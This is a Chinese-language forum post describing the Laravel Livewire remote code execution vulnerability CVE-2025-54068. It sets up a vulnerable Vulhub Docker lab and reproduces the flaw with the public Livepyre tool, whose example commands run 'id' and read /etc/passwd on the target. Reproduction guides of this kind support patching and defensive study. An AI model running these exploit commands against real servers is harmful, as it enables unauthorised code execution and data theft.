V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
phithon
5.05D
V2EX  ›  Vulhub

Laravel Livewire 组件属性水合远程代码执行漏洞(CVE-2025-54068)

  •  
  •   phithon · 17 小时 24 分钟前 · 212 次点击

    Livewire 是一个用于 Laravel 的全栈框架,可以在不离开 Laravel 的情况下轻松构建动态 Web 界面。

    在 3.6.4 版本之前的 Livewire 存在一个严重的远程代码执行漏洞( CVE-2025-54068 )。该漏洞是由于组件属性更新水合( hydration )过程中对代码生成的控制不当导致的。当 Livewire 组件处理来自快照( snapshot )的用户输入时,框架未能正确过滤对象类型,导致攻击者可以注入恶意载荷并在服务器上执行。如果攻击者知道 Laravel 应用的APP_KEY,则利用过程会更加简单。

    参考链接:

    环境搭建

    Vulhub 环境下,进入 livewire/CVE-2025-54068 目录,执行如下命令启动 Livewire 3.6.3 漏洞环境:

    docker compose up -d
    

    服务启动后,访问http://your-ip:8080/可以看到一个示例的 Todo List 应用。

    漏洞复现

    可以使用 @remsio 和 @Worty 开发的 Livepyre 工具来复现该漏洞。首先克隆仓库并安装依赖:

    git clone https://github.com/synacktiv/Livepyre.git
    cd Livepyre
    pip install -r requirements.txt
    

    然后对目标运行漏洞利用程序。该工具会自动检测 Livewire 版本、查找可用的快照,并尝试在不需要APP_KEY的情况下利用该漏洞:

    python Livepyre.py -u http://your-ip:8080/ -f system -p "id"
    

    工具会检查快照中是否存在对象类型的参数。如果存在,则直接触发 RCE ;否则会尝试暴力破解参数。你也可以执行其他命令,比如读取/etc/passwd文件:

    python Livepyre.py -u http://your-ip:8080/ -f system -p "cat /etc/passwd"
    

    1 条回复    2026-01-10 21:21:37 +08:00
    ldapadmin
        1
    ldapadmin  
       17 小时 13 分钟前
    好的 知道了
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   2614 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 33ms · UTC 06:34 · PVG 14:34 · LAX 22:34 · JFK 01:34
    ♥ Do have faith in what you're doing.